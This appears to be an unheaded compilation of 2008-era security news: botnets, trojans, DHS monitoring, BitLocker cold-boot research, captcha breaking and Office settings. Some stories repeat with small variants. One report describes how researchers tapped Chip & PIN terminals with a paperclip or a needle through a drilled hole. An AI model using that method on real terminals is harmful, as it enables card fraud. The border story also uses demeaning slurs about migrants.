daily online news

THE US has made a muppet of its hi-tech border defences along the Arizonian border with Mexico.

Border patrols in Tucson were meant to be patched into a sci-fi panoply of surveillance tools from their car-mounted laptop computers.

Instead, Mexican bandits, cotton picking job hopefuls, fugitive axe murderers and kiddy fiddlers were left free to fiesta! under the eye of an impotent big brother.

Battleplans are meant to be displayed on car mounted laptops in border patrol cars. The information is meant also to be linked with police and other government computer systems. Flying robot drones are to add to the mix.

But border patrollers didn't even have their laptops secured properly. So when they bounced over the rugged Arizona terrain in pursuit of banditos, the computers flapped about and got broken.

The radars didn't work in the rain. The cameras were meant to pick out an economic refugee at 10km, but could only stretch to half of that. Residents along the border have been reluctant to give up their private land for the sake of the defences.

The US Department of Homeland Security has been forced to rethink its plans for an omniscient border patrol and contractor Boeing, which worked on the now defunct pilot, has been commissioned to draw up another set of blue prints for the Imperial defences.

Boeing managed in two years to implement a series of automated watch towers with cameras, radar, and other unspecified sensor equipment, but the system was useless because none of the components could be connected, the US Government Accountability Office, Congress's watchdog, reported with a more diplomatic use of language.

The project was rushed, the costs had been under-estimated and the users hadn't been consulted. The command centre system, which was mean to give border patrollers a realtime view of the landscape and anything that moved in it, wasn't any good.

Officials of the Secure Border Initiative, as the programme is ironically known, said that the Boeing pilot, Project-28, was only a test run anyway. The GAO said it would be delayed and cost more than the DHS had specified.

Miscreants have created a strain of malware capable of removing rootkits from compromised PCs, only to install almost undetectable backdoor code of its own.

The Pandex Trojan stops previously installed rootkits from working by removing their hooks into system calls. Pandex then installs its own rootkit component, detected by Trend Micro as Pushu-AC.

Rootkits are a type of malware that hide their presence on infected PCs, making them more dangerous than typical viruses. By operating below the level of traditional malware scanning tools, rootkits are able to carry out covert functions, for example keystroke-logging, without detection.

Virus writers have competed for control of vulnerable PCs several times in the past. For example, in 2005 separate groups of hackers released a barrage of worms in a battle to seize control of Windows PCs vulnerable to the then infamous Windows Plug-and-Play (PnP) vulnerability.

The Bozori worm was programmed to remove infections by earlier versions of the Zotob worm and other malware, so it could take control of a compromised computer for itself. A family of IRC bots that exploit the same Microsoft Plug and Play vulnerability likewise tried to remove competing PnP bots.

In early 2004, variants of the Netsky worm designed to remove Bagle and MyDoom infections from compromised PCs were released into the wild amid an ongoing war of words between rival VXers.

More recently, a turf war erupted between the creators of the Storm worm and rival gangs.

The Pandex Trojan updates this dishonourable tradition with code that replaces stealthier malware infections.

Cyber-criminals and malware writers are looking for ways to test their creations before distributing them, according to research carried out by security firm PandaLabs.

An investigation conducted by the malware analysis and detection laboratory found that cyber-crooks are collaborating on different forums and internet sites.

The malware writers are attempting to develop test tools that replicate the scans of some of the leading security suites available to consumers and enterprises.

Panda Security believes this allows hackers to thoroughly check that their creations will be undetected before thay are launched.

"The tool is very similar to Hispasec's legitimate Virus Total tool," said Luis Corrons, technical director at PandaLabs.

"In fact, the increasing interest in these new tools coincides with the removal of the 'do not distribute the sample' option in Virus Total which allowed files to be scanned without sending the sample to security companies."

Corrons added that these tools represent another piece of the new malware dynamic in which cyber-crooks no longer seek to cause widespread alerts and make the headlines, but to go unnoticed.

"Even if their creations were detected by one or two companies, they could still launch them as they would affect all users with different security technologies," said Corrons.

Six botnets are responsible for 85 per cent of all spam, according to an analysis by net security firm Marshal.

The Srizbi botnet is reckoned to be the largest single source of spam - accounting for 39 per cent of junk mail messages – followed by the Rustock botnet, responsible for 21 per cent of the spam clogging up users' inboxes.

Spam emanating from the Mega-D botnet, which Marshal reckons was the leading source of junk mail in early February, was temporarily stemmed after control servers were taken out in mid-February. The estimated 35,000 zombie clients associated with the Mega-D botnet were infected with the Ozdok Trojan.

After 10 days of inactivity, spam from compromised hosts began flowing again earlier this week, after hackers re-established control. Despite the break in transmission, Spam-D accounted for an estimated 11 per cent of junk mail hitting Marshal's spam traps during February.

Other active spam botnets include Hacktool.Spammer (AKA Spam-Mailer) and botnets associated with the Pushdo (AKA Pandex) family of malware.

The notorious Storm botnet, estimated to include about 85,000 compromised hosts, is thought to be responsible for only three per cent of spam.

"The size of a botnet, measured by how many bots it has, does not necessarily correlate with how much spam it sends. Our team has observed huge variations in the rate at which different spambots pump out spam," said Bradley Anstis, VP of products at Marshal.

In many instance, spammers have access to multiple botnets. In addition to Mega-D, other botnets - including Srizbi, Rustock, Hacktool.Spammer and Pushdo - have been simultaneously sending spam promoting Express Herbals, a line of male enhancement pills.

According to February statistics from managed security firm Network Box, the US continued to pump out the most spam and spread the most viruses. The country accounted for 13 per cent of all viruses; and was the source of 15 per cent of all spam, more than double its closest junk mail rival, Turkey.

Computer scientists from the University of Cambridge announced this week that debit- and credit-card readers in the U.K. do not encrypt data to the PIN pad, allowing sensitive information to be stolen.

The PIN entry device (PED) vulnerabilities allow an attacker to wiretap a reader and collect enough data from cards and the PIN pad to create counterfeit cards, the researchers stated. The insecurity is due to the way the United Kingdom set up its "Chip & PIN" system and the way reader makers implemented the standard, the researchers stated in a paper to be published at the IEEE Symposium on Security and Privacy in May.

"The vulnerabilities we found were caused by a series of design errors by the manufacturers," Saar Drimer, a researcher at UC's Computer Laboratory and an author of the paper, said in a statement. "They can be exploited because Britain's banks set up the Chip & PIN in an insecure way ... A villain who taps this gets all the information he needs to make a fake card, and to use it."

Credit- and debit-card fraud has garnered increasing amount of attention as laws in the U.S. and Europe have require the disclosure of breaches of personal information. In 2007, retailer TJX Companies announced that online data thieves had gained access to its processing systems and stolen information on more than 100 million credit- and debit-card accounts. In November, the United Kingdom's tax agency acknowledged that two disks lost in the mail had sensitive information on 25 million parents and children.

Because of the losses, retailers have increased their security, albeit slowly, and also lobbied to remove requirements that they hold onto some customers data.

The attack uses a low-tech method of defeating the devices tamper-resistant technology -- a paper clip. The researchers used a paper clip inserted through a hole in the device to tap into the signals sent between the reader and the key pad.

No recall of the devices is planned, the researchers stated.

Is your bank particularly prone to identity theft? Very bad news for those of you with accounts at HSBC, WaMu or Bank of America/MBNA: Those three financial institutions have the highest rates of identity-theft incident per billion on deposit, according to a new report released by researchers at the Berkeley Center for Law and Technology at UC-Berkeley.

Consumerist readers are already pulling apart the stats to entertaining effect, but the presence of BofA/MBNA at the "top" of the incidents-per-month stats also given in the report doesn't much inspire confidence in that institution, whatever the roots of the problem.

So what are the roots of the problem, really? Is BofA just that irresistible to identity thieves? Does the institution have a higher profile? Does it have dumber customers? Hard to say when all banks are so secretive about the stats that could help clarify the picture. Obviously, for instance, the number of depositors would be a better metric than billions on deposit in ascertaining which institutions are having the biggest ID-theft misery. But banks guard that info as zealously as you wish they were guarding your personal data.

A new Bush administration plan to capture and analyze traffic on all federal government networks in real time is generating privacy worries from congressional Democrats and Republicans alike.

At a hearing convened here Thursday by the U.S. House of Representatives Homeland Security Committee, politicians directed pointed questions to Department of Homeland Security officials about their plans to expand an existing "intrusion detection" system known as Einstein. Among other things, the system will monitor visits from Americans--and foreigners--visiting .gov Web sites.

Einstein, which DHS calls an "early warning system" for cyber-incidents, is described in a Homeland Security document from September 2004 as "an automated process for collecting, correlating, analyzing, and sharing computer security information across the federal civilian government." It's still only in place at 15 federal agencies, but Homeland Security Secretary Michael Chertoff requesting $293.5 million from Congress in next year's budget to roll it out government-wide.

The round-the-clock system captures traffic flow data, which currently includes source and destination IP addresses and ports, Internet Control Message Protocol data, and the length of data packets. According to an internal 2004 privacy impact assessment (PDF), "the program is not intended to collect information that will be retrieved by name or personal identifier." Members of the U.S. Computer Emergency Readiness Team, which coordinates federal responses to cyber attacks, analyze the downloaded records once per day in hopes of detecting worms and other "anomalous activity," pinpointing trends, and advising agencies on how best to configure their systems.

Homeland Security says the setup has helped reduce the time it takes for agencies to share such data from four to five days to four to five hours. The next step is to hire more analysts and enable the analysis to occur in real time, DHS says.

Beyond that, it's not exactly clear what will change, including whether the system will gather more information than before, or what will be done with it. But some politicians said they're already apprehensive about the new plans.

"I encourage you to try to find something beyond Einstein that's going to be focusing on bad guys, not just focusing on the general public but finding some way to protect the privacy of American citizens," said Rep. Paul Brown (R-Ga.).

Rep. Jane Harman (D-Calif.) criticized the department on one hand for treating cyber threats with sufficient urgency--a common refrain from members of both parties ever since the sprawling government agency's inception. But she also questioned the new approach being offered.

"I can assure you constituents of mine listening to this hearing are thinking about this as the government sets up a new spy network," she said. "What would you advise me to tell my constituents (who want to know) how I'm going to stop this latest government spy network?"

Robert Jamison, a Homeland Security undersecretary whose division oversees cybersecurity activities, declined to talk specifics, saying details must be reserved for a classified session.

"We have privacy and civil rights folks involved in this," he said. "We're in the process doing a privacy impact assessment for the new capability as we move forward."

Government agencies are required by law to produce such a report whenever they're planning to use a new technology that could involve collection of personally identifiable information. The goal is to ensure that no information is collected, stored, or accessed either unnecessarily or unlawfully.

The fact that Homeland Security officials are drawing up a new privacy impact assessment for the expansion of the Einstein project would seem to indicate they're considering gathering additional information, although it was unclear after Thursday's hearing whether that's the case.

Jamison, for one, claimed Einstein's new capabilities will be "no different" from those in commercial products used to detect worms or other malware. He indicated, however, that the government has no intention of scaling back the scope of its network monitoring.

"Adversaries are very adept at hiding their attacks in normal traffic--normal, everyday traffic that comes across the network that very well could be disguised and could be malicious," Jamison told the committee.

Einstein is just one part of Homeland Security's attempts to revamp its cybersecurity reputation. It's also working with the Office of Management and Budget on a project that would reduce the number of points at which all federal agency networks connect to the Internet--which right now numbers around 4,000--and thus encounter vulnerabilities from outside their realms.

Whenever a system monitors users' communications, privacy concerns naturally arise, said James Lewis, who runs the technology policy wing of the Center for Strategic and International Studies, a Washington think tank, and is working with members of Congress to devise cybersecurity policy recommendations for the next president. In this case, however, he said he didn't see any reason to be alarmed about Einstein quite yet.

"For Einstein to really affect privacy, you'd need to monitor and collect the communications, store them, and analyze them (e.g. have somebody actually read the content)," he said in an e-mail interview after Thursday's hearing. "I'm told that DHS won't store Einstein data and won't be analyzing it, which greatly reduces any risk to privacy."

Committee leaders warned that they'd be watching closely to see whether the plans pan out.

"It's hard to believe this administration now believes it has the answers to secure our federal networks and critical infrastructure," said Committee Chairman Bennie Thompson (D-Miss.).

Miscreants have created a strain of malware capable of removing rootkits from compromised PCs, only to install almost undetectable backdoor code of its own.

The Pandex Trojan stops previously installed rootkits from working by removing their hooks into system calls. Pandex then installs its own rootkit component, detected by Trend Micro as Pushu-AC.

Rootkits are a type of malware that hide their presence on infected PCs, making them more dangerous than typical viruses. By operating below the level of traditional malware scanning tools, rootkits are able to carry out covert functions, for example keystroke-logging, without detection.

Virus writers have competed for control of vulnerable PCs several times in the past. For example, in 2005 separate groups of hackers released a barrage of worms in a battle to seize control of Windows PCs vulnerable to the then infamous Windows Plug-and-Play (PnP) vulnerability.

The Bozori worm was programmed to remove infections by earlier versions of the Zotob worm and other malware, so it could take control of a compromised computer for itself. A family of IRC bots that exploit the same Microsoft Plug and Play vulnerability likewise tried to remove competing PnP bots.

In early 2004, variants of the Netsky worm designed to remove Bagle and MyDoom infections from compromised PCs were released into the wild amid an ongoing war of words between rival VXers.

More recently, a turf war erupted between the creators of the Storm worm and rival gangs.

The Pandex Trojan updates this dishonourable tradition with code that replaces stealthier malware infections.

THE US has made a muppet of its hi-tech border defences along the Arizonian border with Mexico.

Border patrols in Tucson were meant to be patched into a sci-fi panoptoly of surveillance tools from their car-mounted laptop computers.

Instead, Mexican bandits, cotton picking job hopefuls, fugitive axe murderers and kiddy fiddlers were left free to fiesta! under the eye of an impotent big brother.

The US Department of Homeland Security has been forced to rethink its plans for an omniscient border patrol and contractor Boeing, which worked on the now defunct pilot, has been commissioned to draw up another set of blue prints for the Imperial defences.

Boeing managed in two years to implement a series of automated watch towers with cameras, radar, and other unspecified sensor equipment, but the system was useless because none of the components could be connected, the US Government Accountability Office, Congress's watchdog, reported with a more diplomatic use of language.

The project was rushed, the costs had been under-estimated and the users hadn't been consulted. The command centre system, which was mean to give border patrollers a realtime view of the landscape and anything that moved in it, wasn't any good.

Boeing started working on another version of the COP (common operating picture) system that the Washington Post said would be based on military battleplan software.

DHS has specified that it should "detect, identify and classify" any object in the border area. Battleplans are meant to be displayed on car mounted laptops in border patrol cars. The information is meant also to be linked with police and other government computer systems. Flying robot drones are to add to the panoptoly.

But border patrollers didn't even have their laptops secured properly. So when they bounced over the rugged Arizona terrain in pursuit of banditos, the computers flapped about and got broken.

The radars didn't work in the rain. The cameras were meant to pick out an economic refugee at 10km, but could only stretch to half of that. Residents along the border have been reluctant to give up their private land for the sake of the defences.

Officials of the Secure Border Initiative, as the programme is ironically known, said that the Boeing pilot, Project-28, was only a test run anyway. The GAO said it would be delayed and cost more than the DHS had specified.

The Alamo doesn't appear to be coping too well with the barbarian siege. Run for the hills

On Monday, Adobe Systems rolled out its new Web 2.0 development tool, Adobe Integrated Runtime, or AIR. Following its release were some concerns from the security community.

AIR, formerly Adobe Apollo, is a runtime environment that allows developers use HTML, Flash, AJAX, Flex, and other Web 2.0 tools to create desktop applications. One such application built using Adobe AIR comes from Nickelodeon Online.

But some security experts are concerned about local file access by AIR applications. Recently, Firefox experienced a vulnerability that could have allowed remote attackers to access a targeted file system. To mitigate this, Adobe says it implemented a sandboxing environment, however, Adobe's documentation suggests that the sandboxes are less secure than a Web browser's sandbox.

Additionally, Adobe says that AIR applications need to be digitally signed, however, these certificates can be self-signed. And many users will ignore the warnings and run untrusted applications.

Finally, there is the potential for Cross-Site Scripting (XSS), SQL injection, and local link injection. While these threats are not limited to Adobe AIR, developers could gain a false sense of security by relying only on AIR's weaker sandbox protection.

Adobe has also provided the following: an informative article titled "Introduction to AIR security" and a white paper, "AIR Security" (PDF). But Lenny Zeltser, writing on the Sans Internet Storm Center site, notes that "many developers will be unaware of Adobe AIR security best practices or will knowingly take shortcuts that expose end users to attacks."

A disk encryption system built into Windows Vista remains a viable way to protect sensitive files, according to Microsoft. In a blog posting, Russ Humphries, senior product manager for Windows Vista Security, outlined simple steps that users can take to prevent an attack laid out last week in a high-profile research report. He says the hack can be easily prevented.

The researchers demonstrated a novel way to access files that presumably were locked using Vista's BitLocker and similar disk encryption systems offered by competitors such as Apple. They showed it was possible to pilfer the encryption key needed to unlock the files by accessing a "ghost image" that remained in a computer's memory after the system entered hibernation mode. Ten minutes after machines were powered down, the researchers were still able to access the key by using compressed air to cool the memory chips.

According to Humphries, the hack is easily prevented. Users can configure BitLocker to prevent a PC from booting, or resuming from hibernation without confirmation of a password or a second key contained on a USB stick.

"The thing to keep in mind here is the old adage of balancing security, usability and risk," he wrote. "For example BitLocker provides several options that allow for a user (or more likely Administrator) to increase their security protections but at the cost of somewhat lowering ease-of-use."

He said BitLocker allows administrators to remotely change protection settings by having a script execute.

"Thanks to BitLocker's design, which implements key abstraction, a script can be executed that adds pre-boot protection mechanisms without requiring the re-encryption of the hard disk. This script can therefore execute very quickly.
Exotica

Humphries also worked to downplay the likelihood that an attack as exotic as this one would work in the trenches or real-world crime. Thieves would first have to get physical access to a machine and the machine would most likely need to be in sleep mode.

"I would posit that the opportunistic laptop thief is somewhat unlikely to carry a separate laptop on which they will have installed tools that allow them to reconstruct cryptographic keys - or for that matter have a can of compressed air handy."

The Bitlocker attack is a wake-up call for privacy and security buffs because it demonstrated a fundamental weakness in a key tool used to protect sensitive data. BitLocker, and a similar feature that Apple has baked into OS X called FileVault, allow users to encrypt selected files or entire hard drives. In the event a PC is lost or stolen, files containing trade secrets, employee data or other confidential information would be unreadable to anyone without the key.

According to the researchers, who came from Princeton University, Wind River System and the Electronic Frontier Foundation, there is little that can be done to prevent ghost images from being readily accessed. Software changes are likely to be ineffective, and altering the way hardware works inside a laptop would take years.

But as Humphries demonstrates, one or two additional measures could make all the difference. Question is, will anyone use them?

McAfee has unearthed a Windows Mobile PocketPC Trojan that disables security, installs via a memory card, can’t be uninstalled and makes itself your home page.

According McAfee’s Avert Labs blog, the Trojan has been discovered in China. Here’s how it works according to researcher Jimmy Shah:

WinCE/InfoJack sends the infected device’s serial number, operating system and other information to the author of the Trojan. It also leaves the infected mobile device vulnerable by allowing silent installation of malware. The Trojan modifies the infected device’s security setting to allow unsigned applications to be installed without a warning.

The Trojan was packed inside a number of legitimate installation files and distributed widely. It has been distributed with Google Maps, applications for stock trading, and a collection of games.

Considering the penetration of mobile devices in Asia this malware could raise quite a ruckus.

Shah reckons that WinCE/InfoJack was created by a web site that may have hired a hacker to create the malware and then distribute it. The Trojan installs as an autorun program on the memory card, installs itself when that memory card is inserted and can’t be deleted. It also becomes your home page.

LONDON (Reuters) - Killer robots could become the weapon of choice for militants, a British expert said on Wednesday.

Noel Sharkey, professor of artificial intelligence and robotics at the University of Sheffield said he believed falling costs would soon make robots a realistic option for extremist groups.

Several countries and companies are developing the technology for robot weapons, with the U.S. Department of Defense leading the way. More than 4,000 robots are deployed in Iraq.

"The trouble is that we can't really put the genie back in the bottle. Once the new weapons are out there, they will be fairly easy to copy," Sharkey will tell a one-day conference organized by Britain's Royal United Services Institute on Wednesday.

"How long is it going to be before the terrorists get in on the act? With the current prices of robot construction falling dramatically and the availability of ready-made components for the amateur market, it wouldn't require a lot of skill to make autonomous robot weapons."

Sharkey said a small GPS-guided drone with autopilot could be made for about 250 pounds ($490).

According to a recent article in Federal Computer Week, foreign criminal hackers are targeting American health records.

Mark Walker of DHS Critical Infrastructure Protection Division recently told a National Institute of Standards and Technology workshop that the hackers' primary motive seems to be espionage. For example, any health problems among the nation's leaders would be of interest to potential enemies, he said.

Walker cited two events from 2007. In one, a virus was placed on the Centers for Disease Control and Prevention Web site. In another, there was a known data breach in the Tricare records for the Military Health System.

The Department of Homeland Security wants to build a database of health care-related data breaches. At present, Walker told the workshop that the DHS only has a vague understanding of data loss connected with health care services.

On a related note, the U.S. Department of Health & Human Services has outlined the bases and procedures for imposing civil money penalties on covered entities that violate any of the Health Insurance Portability & Accountability Act of 1996 (HIPAA) Administrative Simplification Rules. The Centers for Medicare and Medicaid Services (CMS) will enforce HIPAA Transactions and Code Set Standards, while Office for Civil Rights will enforce Privacy Standards. The final rules for security compliance cover specific areas of data storage, such as who must be interviewed regarding compliance, and what aspects of the company's IT security policy must be reviewed.

The average data breach can cost anywhere between £84,000 and £3.8m, depending on how quickly it is discovered and the type of information lost, says research.

The average cost is £47 per individual record compromised – except in financial services firms where costs rise 17 per cent to £55 per record, according to the study by the Ponemon Institute.

Data is mostly lost through third parties, said Joseph Ansanelli, vice president of data loss prevention solutions at Symantec, which sponsored the research.

"The fact that more than a third of breaches result from data being shared with third parties in the normal course of business is a clear signal that organisations should examine how they are sharing their customers' data with outsourcers, vendors, and partners," he said.

Companies suffering a breach see a 2.5 per cent higher than normal customer "churn" rate, which contributes up to a third of the costs incurred.

More than a third (36 per cent ) of data breaches are due to lost and stolen laptops or other mobile devices.

The major suites promise to safeguard your private data--but their protections vary.

Privacy control. Personal-information protection. Identity control. All are great-sounding names for features you may have seen in your PC's security suite. But what do they actually do?

To find out, I dug into the privacy features of the top suites from PC World's latest security roundup: Symantec Norton Internet Security 2008's Privacy Control (part of its free Norton Add-on Pack), Kaspersky Internet Security 7.0's Privacy Control, McAfee Internet Security Suite's Personal Information Protection, and BitDefender Internet Security Suite 2008's Identity Control.

With Symantec, McAfee, and BitDefender, you must define the information that you want to protect, such as Social Security and credit card numbers. Symantec and McAfee never prompt you to do so, but BitDefender alerts you until you either comply or tell it to stop. With Kaspersky, you don't give any instructions, since it automatically blocks malware that attempts to access your computer's Windows Protected Storage area, including sensitive Web-form information such as credit card numbers.

If the Symantec, McAfee, or BitDefender suite notices that your PC is about to send the information you registered over the Internet, the program blocks the transmission or prompts you to allow or disallow it. Symantec checks Web, e-mail, and IM connections, BitDefender scans Web and e-mail traffic, and McAfee handles just Web data. All three are limited to scanning nonencrypted connections, so they won't see anything you send to secure sites, but such https:// sites are mostly already protected. And since many Internet service providers accept e-mail only via an encrypted connection, the privacy apps can't scan those messages either. Generally, though, they can scan Web-based e-mail such as Google's Gmail, because most providers require you to use a secure connection to log in but switch to a nonsecure connection once you are in.

Symantec and McAfee prompt you to allow sending personal data, and substitute asterisks for the data when you choose to block sending it. BitDefender blocks outright any e-mail or Web pages in which you've entered personal data without giving you any option to make it do otherwise, which can be annoying.

If you have Symantec's package or McAfee's suite, take the few minutes required to define your sensitive information. I can't think of a site that would ask for such details and not be encrypted, and setting up the privacy protections will allow you to receive warnings. BitDefender's feature, however, may irritate more than it protects because it doesn't allow sending protected data even if you trust the situation. Kaspersky's feature is both more and less limited, since its malware-focused approach doesn't require any extra setup but protects only a subset of your information.

Researchers from Cambridge University have succeeded in capturing both PIN numbers and card details from supposedly tamper-proof PIN terminals.

Saar Drimer and Steven Murdoch, overseen by Professor Ross Anderson, managed to hack two widely used PIN terminals: the Ingenico i3300 and the Dione Xtreme.

In a research paper seen by ZDNet.co.uk, the researchers outline the hack. Both terminals have tamper-proof mechanisms inside, but both can be circumvented by tapping the data line of the PIN Entry Device/smartcard interface. The data exchanged on this line is not encrypted.

The Ingenico i3300 has a tamper-response switch inside which is tripped if the terminal is forced open, and also has its innards wrapped in a tamper-proof mesh, to detect drilling. However, there is a user-accessible compartment to insert SIM cards that is not intended to be tamper-proof. The PCB has various holes that an attacker can use to insert a conductor into the serial data line, to tap both the PIN and card details. The researchers used a paper clip as the conductor, linked to the data line.

The Dione Xtreme also has a tamper-response switch, but no mechanisms to detect drilling from the rear. The main keypad and processor are "potted together", making it more difficult to incept the signal passing between them. However, by drilling a 0.8mm hole from the rear, the researchers inserted a 4cm needle into a flat ribbon connector socket and tapped the data.

In both cases, the conductors were connected to a thin wire connected to a logic board containing a field programmable gate array (FPGA), which translated the data and sent it to a laptop.

Both devices were Visa-certified to be secure, which requires that defeating the tamper detection would cost over $25,000 (£12,500) per-PIN entry device; or that inserting a PIN-stealing bug would be detected, or take more than 10 hours.

Neither terminal meets any of these requirements, said the researcher paper.

"What should have required $25,000 needed just a bent paperclip, a needle, a short length of wire and some creative thinking; attaching them to the data line takes minutes with some practice," said the paper.

"What this shows is that PIN entry devices in the UK are very insecure," said Professor Anderson about the research. "What's more, the [device] certification process is completely defective. Certified devices are easy to breach. That's bad news for retailers, and bad news for customers."

Drimer added that this hack showed the complete process from design to implementation of these devices was broken.

"These devices should not have been certified because they clearly fail the criteria under which they were evaluated," Drimer told ZDNet.co.uk. "Something went wrong in the design of these devices, the certification process, and the EMV implementation choices made by the banks."

Ingenico admitted that the hack was successful, but said that its device "still remained one of the safest on the market".

A spokesman for Ingenico Northern Europe said: "Retailers and card users should rest assured that the devices, from various suppliers, identified by the Cambridge University scientists, remain among the most secure terminals on the market and have contributed to card fraud at UK retailers falling by up to 47 percent year-on-year since the introduction of chip and PIN. The banking industry has already expressed its confidence in the security capabilities of all chip and PIN payment devices being used in the UK today.

"The method identified by the Cambridge University paper requires specialist knowledge and has inherent technical difficulties. This method is therefore not reproducible on a large scale, nor does it take into account the fraud monitoring used throughout the industry."

"Security remains a top priority for Ingenico and we invest around €40m each year in research and development to ensure our customers remain at the forefront of the fight against fraud."

"This investment is highlighted in the latest generation of our terminals which are approved under the latest security standards. These meet the higher security required by industry mandates introduced on 1 January, 2008 and are designed to stay one step ahead of the evolving security threat."

Dione, which is manufactured by Verifone, had not responded to a request for comment at the time of writing.

A state judge in Oklahoma has publicly accused reporters covering a high-profile murder trial of hacking into her computer and stealing a secret ruling she issued in the case.

Cleveland County District Judge Candace Blalock made the allegations after a local TV station reported that portions of a confession police obtained from the defendant could be presented at trial. For reasons that still aren't clear, Blalock, who is presiding over the trial, emailed a copy of the confidential ruling to her home computer. Shortly after that, KWTV-9 News reported the decision.

"I don't doubt that they hired people to hack into the computers," she said, according to this news account. "That's what I think happened, and I think that because I do not believe any of the lawyers involved here would violate" the confidentiality order.

Officials at the television station didn't return a call seeking comment.

The accusation came in the trial of 28-year-old Kevin Underwood, who is being tried for the cannibalistic killing of a 10-year-old neighbor. Given the extreme intrigue created by the case, Blalock said, she believes reporters took extraordinary measures to obtain the ruling.

"I am suspecting that I may have caused a problem myself," she said, by "titillating" the news media with information about a ruling that was not obtainable.

A Harvard Website was hacked recently, with 125 MB of records stolen and later uploaded to BitTorrent for Peer-to-Peer distribution. gsas.harvard.edu was still down at the time this article was researched (it’s back up now).

The site was a local Joomla installation. A variety of simple Joomla! hacks have been identified and shared around the web in recent weeks. Most of these claimed vulnerabilities exploit weaknesses in 3rd party modules, which exposed some SQL Injection gaps. It is not yet clear whether the Harvard Grad. School of Arts and Sciences site fell victim to such an attack.

According to Calum McLeod of protection experts Cyber-Ark “the Harvard University hack apparently involves the complete site database — allegedly including hidden system files. If the University had used a data encryption system on its most sensitive files, then this systematic site hack would probably not have occurred.”

Although the methods employed by the hacker are not yet known, one popular hackers’ board lists exploits for no fewer than 14 Joomla! components (url on request), all of which have appeared since the beginning of this month (Feb 2008). Popular modules cited as vulnerable include Galeria, Quiz, NeoGallery and a range of _com components. All the listed vulnerabilities were SQL Injection strings or remote SQL Injection attack methods.

Sunnyvale startup Wirama announced that they've finished the most precise RFID reader available yet, with the ability to locate passive RFID tags to within 6 inches (through the EPC Class 1 Gen 2 standard). Up to now, only the most expensive RFID readers could locate a precise passive tag at that accuracy and used (wasteful) batteries for power. This means that the ability to track inventory through an RFID system will soon lower the entry costs into the tech, likely replacing barcodes, and may allow small businesses to save cash by keeping precise, real-time track of their wares.

As long as it doesn't lead to a crunchy, RFID-filled strawberry that will stick to the insides of my stomach, remotely track my whereabouts throughout the world, and lead to a vast history bank sorting my directional choices like a lab rat, it seems like a cool breakthrough.

At the moment, the reading range of the software algorithm within RFID tags is about 15 feet, long enough for your own version of Michael Scott to read your emails and know when you're going to the bathroom too much.

A couple of months ago, Rob Beschizza talked about the use of short-range-capable RFID badges to track attendees at CES 2008 and decided he was fine with it.

Spammers, fresh from the success of cracking the Windows Live captcha used by Hotmail, have broken the equivalent system at Gmail.

Internet security firm Websense reports that miscreants have created bots which are capable of signing up and creating random Gmail accounts for spamming purposes, defeating Captcha-based defences in the process. It reckons the same group of spammers are behind both attacks.

Captcha (Completely Automated Public Turing test to tell Computers and Humans Apart) challenge-response systems, which are used to prevent accounts being created until a user correctly identifies letters in an image, are designed to ensure requests are made by a human rather than an automated program. The technique has been used to defeat automatic sign-ups to email accounts by services including Yahoo! Mail and Gmail for years, and hackers are increasingly successful in defeating the approach. For example, the HotLan Trojan has created more than 500,000 spam email accounts with Hotmail, Yahoo! and Gmail since its arrival back in July 2007.

Websense reckons the latest Gmail Captcha hack is the most sophisticated it has seen to date. Unlike Live Mail Captcha breaking, which involved just one zombie host doing the entire job, the Gmail breaking process involves two compromised hosts. Each of the two compromised hosts applies a slightly different technique to analysing Captcha, as explained in a posting by Websense.

Even using the two techniques, only one in every five Captcha-breaking requests are successful. It's a fairly low percentage, but one that's still more than workable in the case of automated attacks.

It sounds like a lot of effort, but gaining a working Gmail account has a number of advantages for spammers. As well as gaining access to Google's services in general, spammers gain a address whose domain is highly unlikely to be blacklisted, helping them defeat one aspect of anti-spam defences. Gmail also has the benefit of being free to use.

A wide range of Captcha-breaking services are hosted on a domain located in the US, Websense reports. The page includes a support page and payment advice along with an internal test page.

You trust Microsoft Office with your most important documents, spreadsheets, e-mail, and presentations. Unfortunately, many of the default security settings in Office applications may not provide a sufficient level of protection for your data, your system, and your reputation. Follow these steps to fine-tune the security settings in Office 2003; tomorrow I'll cover the new security options in Office 2007's Trust Center and elsewhere.

Office 2003 lets you encrypt files so that you need a password to read or edit them. In Word 2003, open the document and click Tools > Protect Document. To restrict the styles that can be applied to the file, check Limit formatting to a selection of styles, and click Settings. Uncheck the styles you don't want to allow, or choose one of the other style-restriction options, and click OK. To make the document read-only, check Allow only this type of editing in the document, and select one of the options in the drop-down menu: Tracked changes, Comments, Filling in forms, or No changes (Read only).

Choose an option in Word 2003's Protect Document dialog box to restrict access to the document.

You can also designate the people who can access the file by clicking More users, entering their user names or e-mail addresses, and clicking OK. When you're done, click Yes, Start Enforcing Protection. In the resulting dialog box, choose either Password and enter the password twice that will decrypt the file, or select User authentication, which allows the people you designate to remove the file's protection.

The User authentication option requires Microsoft's Information Rights management, which requires the Windows Rights Management client. This in turn requires a .NET Passport account, and your agreement to the "free trial," though there's no indication if or when the trial will end. Microsoft promises to maintain the privacy of your files, and to make them available for three months after the trial ends, if you maintain the .NET Passport account. There may be a good reason to go this route, but to keep things simple, I stick with the password option. To remove these settings, click Tools > Unprotect document, and enter the password (if you chose this method of protection).

Choose Password and enter the password that will open the file, or select User authentication to allow the people you designate to read, edit, and/or comment on the document.

To protect a worksheet or file in Excel 2003, click Tools > Protection, and choose your preferred protection method: Protect Sheet, Allow Users to Edit Ranges, Protect Workbook, or Protect and Share Workbook. If you choose the first option, you're prompted to enter a password to unlock the sheet, and you can limit the actions people can take when working on the sheet. The second selection opens a dialog box in which you can specify the ranges that will be unlocked by a password by clicking New and entering the ranges. You can allow specific people to edit, or list the users who can't edit the range without a password by clicking Permissions and entering their user or group names. The third and fourth options are similar to the first, but apply to the entire workbook rather than a specific worksheet.

In PowerPoint 2003, click Tools > Options > Security, enter a password that will let the presentation be opened or modified, and click the Advanced button to select an encryption type. This dialog box also lets you remove hidden data from the file, and adjust your macro security settings (the default allows only signed macros from trusted sources, though this is of questionable value since "trusted sources" is pretty meaningless).

Outlook 2003's security options let you encrypt outgoing attachments, restrict the sites that can send you scripts and active content (the same list that's in your Internet Options), and limit the receipt of images and file downloads. But two of the most important things you can do to protect yourself from malware in Outlook are to turn off the Reading Pane (aka Preview Pane), and to view your mail as plain text. To deactivate the Reading Pane, click View > Reading Pane > Off. And to switch from HTML mail to the safer plain text, click Tools > Options > E-mail Options, check Read all standard mail in plain text, and click OK. When you want to view a message in its original HTML format, click the beige message bar across the top of the message window and select Display as HTML.

Protect yourself from malicious messages in Outlook 2003 by selecting "Read all standard mail in plain text" in the program's E-mail Options.

